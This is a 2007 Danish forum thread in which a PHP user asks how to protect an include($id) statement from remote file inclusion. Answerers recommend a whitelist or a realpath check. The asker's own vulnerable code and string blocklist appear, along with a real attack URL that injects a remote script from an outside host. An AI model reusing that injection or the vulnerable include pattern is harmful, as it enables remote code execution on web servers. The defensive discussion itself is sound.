Avatar billede pumba Nybegynder
23. januar 2007 - 18:20 Der er 7 kommentarer og
1 løsning

Include - sikring imod phishing og externe links.

Hvis man vil sikre PHP include statement imod eksterne links og (phishing), hvordan gøres dette bedst og optimalt ?

Sådan ser min PHP-kode ud - omkring include'n:

if (stristr($id, 'http') == TRUE) { exit("Hacking - STOP!!"); }
if (stristr($id, 'www') == TRUE) { exit("Hacking - STOP!!"); }
if (stristr($id, '//') == TRUE) { exit("Hacking - STOP!!"); }

include($id);

Meeeen - "sikringen" virker ikke.....

Hilfe!

:-)
Avatar billede erikjacobsen Ekspert
23. januar 2007 - 18:31 #1
Du kan fx sikre din mod denne form ved at anvende:  www.dinside.dom?id=2
og

  if ($id=='1') include('forside.php');
  if ($id=='2') include('links.php');
  if ($id=='3') include('kontakt.php');

Altså, groft sagt, aldrig bruge nogen form for user-input til en include.
Avatar billede coderdk Praktikant
23. januar 2007 - 18:44 #2
Jeg antager at scriptet er i roden af sitet, kan du muligvis bruge dette, og stadig være sikker på at der kun bliver inkluderet filer fra roden og "opefter":

$root = realpath(".");
$id = ( !empty( $_GET['id'] ) ? $_GET['id'] : '' );
$pth = realpath( $root . "/" . $id );
if ( substr( $pth, 0, strlen( $root ) ) != $root )
{
  die( "Det tror jeg ikke..." );
}
include( $pth );
Avatar billede pumba Nybegynder
24. januar 2007 - 20:10 #3
Jeg forstår det med user-input - men det betyder så at menu'en skal vedligehold flere steder - det vil give et utroligt stort mer-arbejde. Så nok er den sikker, men ikke godt vedligeholdelses-mæssigt. Så denne løsning har jeg haft tidligere, men fjernet,
da det ikke er hensigtmæssigt.

Omkring realpath etc. - så jeg har prøvet denne. Men jeg kan ikke få den til at virke :-(

Har andre nogle forslag ??
Avatar billede erikjacobsen Ekspert
24. januar 2007 - 20:16 #4
Menuen skal i givet fald vedligeholdes i een include-fil. Jeg siger ikke det er den eneste måde, men du har total afkobling mellem userinput og dit filsystem/etc
Avatar billede pumba Nybegynder
24. januar 2007 - 20:56 #5
Hej igen

Uhm. Jeg har forsøgt at indlægge nogle test på "strengen" - de fanges rigtig nok i
browseren!!!!!!!!!!!!, men det stopper åbenbart ikke imod phishing filer fra "andre steder":

http://www.xxx.dk/index.php?id=http://p10.hostingprod.com/@jplant-1.com/jplant.txt?"

???

if (stristr($id, 'http') == TRUE) { exit("STOP!!."); }
include($id);
Avatar billede pumba Nybegynder
31. januar 2007 - 07:54 #6
Jeg havde en forventning om, at man kunne teste på om "include-filen" overholder 2 krav:

* dels skal den forefindes på EGEN server
* dels skal den findes i den aktuelle folder (eller anden navngivet)
Avatar billede pumba Nybegynder
31. januar 2007 - 07:57 #7
okey
Avatar billede coderdk Praktikant
31. januar 2007 - 09:11 #8
Min opfylde begge krav, så længe du ikke bruger http:// - Det er der jo heller ingen grund til, eftersom det er på samme server.